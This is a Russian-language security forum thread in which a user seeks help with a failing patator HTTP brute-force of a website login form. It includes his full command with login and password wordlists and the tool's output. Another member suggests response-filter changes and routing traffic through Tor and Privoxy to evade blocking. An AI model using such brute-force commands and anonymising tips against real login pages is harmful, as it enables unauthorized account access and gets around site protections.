• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

  • CTF с учебными материалами Codeby Games

    Обучение кибербезопасности в игровой форме. Более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике и Криптографии. Школа CTF с бесплатными курсами по всем категориям.

Проблема с patator

kasperai

Active member
01.05.2019
38
0
BIT
0
Пытаюсь за брутить свой аккаунт, но не получается. На сайте есть капча, пытался через proxychains4, но так же без толку.
Так же пытался через fgrep и code, тоже не получается.


Код:
patator http_fuzz url=https://-----------/cab/auth?return_uri=/cab method=POST body='return_uri=%2Fcab&login=FILE1&password=FILE0' 1=/root/login.txt 0=/root/pass.txt follow=1 -x ignore:fgrep='Неверный пароль'

17:20:40 patator    INFO - Starting Patator v0.7 (https://github.com/lanjelot/patator) at 2019-10-09 17:20 MSK

17:20:40 patator    INFO -                                                                          

17:20:40 patator    INFO - code size:clen       time | candidate                          |   num | mesg

17:20:40 patator    INFO - -----------------------------------------------------------------------------

17:20:41 patator    INFO - 200  5997:6092      0.077 | 17626225577:ajl1325q                 |     1 | HTTP/1.1 200 OK

17:20:41 patator    INFO - 200  6003:6098      0.041 | 17626225577:jgfsjsgfjsgf           |    11 | HTTP/1.1 200 OK

17:20:41 patator    INFO - 200  5999:6094      0.043 | 17626225577:jgfsjsgf               |     3 | HTTP/1.1 200 OK

17:20:41 patator    INFO - 200  6003:6098      0.075 | 17626225577:hjgfsjsfgjsg           |     4 | HTTP/1.1 200 OK

17:20:41 patator    INFO - 200  6002:6097      0.043 | 17626225577:gsfjsgfjsgf            |    10 | HTTP/1.1 200 OK

17:20:41 patator    INFO - 200  6002:6097      0.077 | 17626225577:sfgjgsfjgsf            |     2 | HTTP/1.1 200 OK

17:20:41 patator    INFO - 200  6003:6098      0.041 | 17626225577:jsgfjsgfjgfs           |    12 | HTTP/1.1 200 OK

17:20:41 patator    INFO - 200  5999:6094      0.042 | 17626225577:gfhjfghj               |    13 | HTTP/1.1 200 OK

17:20:41 patator    INFO - 200  6001:6096      0.077 | 17626225577:fjsgfjgfsj             |     5 | HTTP/1.1 200 OK

17:20:41 patator    INFO - 200  6001:6096      0.048 | 17626225577:gfsjsgfjsg             |     6 | HTTP/1.1 200 OK

17:20:41 patator    INFO - 200  6001:6096      0.076 | 17626225577:fjsgfjgfsj             |     7 | HTTP/1.1 200 OK

17:20:41 patator    INFO - 200  6003:6098      0.082 | 17626225577:sgfjsgfjgsfj           |     8 | HTTP/1.1 200 OK

17:20:41 patator    INFO - 200  5997:6092      0.048 | 17626225577:1admin                 |     9 | HTTP/1.1 200 OK

17:20:41 patator    INFO - Hits/Done/Skip/Fail/Size: 13/13/0/0/13, Avg: 21 r/s, Time: 0h 0m 0s
 

sever0ever

Green Team
23.05.2019
18
14
BIT
0
Уже отвечал тебе в подобной теме "Просто поменяй запрос c ignore:fgrep='Неверный пароль' на ignore:code=200 или СКИДЫВАЙ ВЕСЬ HEADERS если тебе так важно именно через ignore:fgrep. Проверь нужны ли куки или токены при отправке запроса. Если не сработает через ignore:code=200, проверь на наличие всех зависимостей."
Proxychains очень не надежен, лучше используй связку tor+privoxy для всего трафика Как весь трафик в Kali Linux пропускать через Tor (настройка Tor и Privoxy в Kali Linux 2.0)
 

kasperai

Active member
01.05.2019
38
0
BIT
0
Всё ровно не выходит, пытался через code=200, но не выходит.
Установил privoxy и весь трафик проходит через него, но ничего не изменилось.
 

kasperai

Active member
01.05.2019
38
0
BIT
0
1.png
2.png

3.png
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!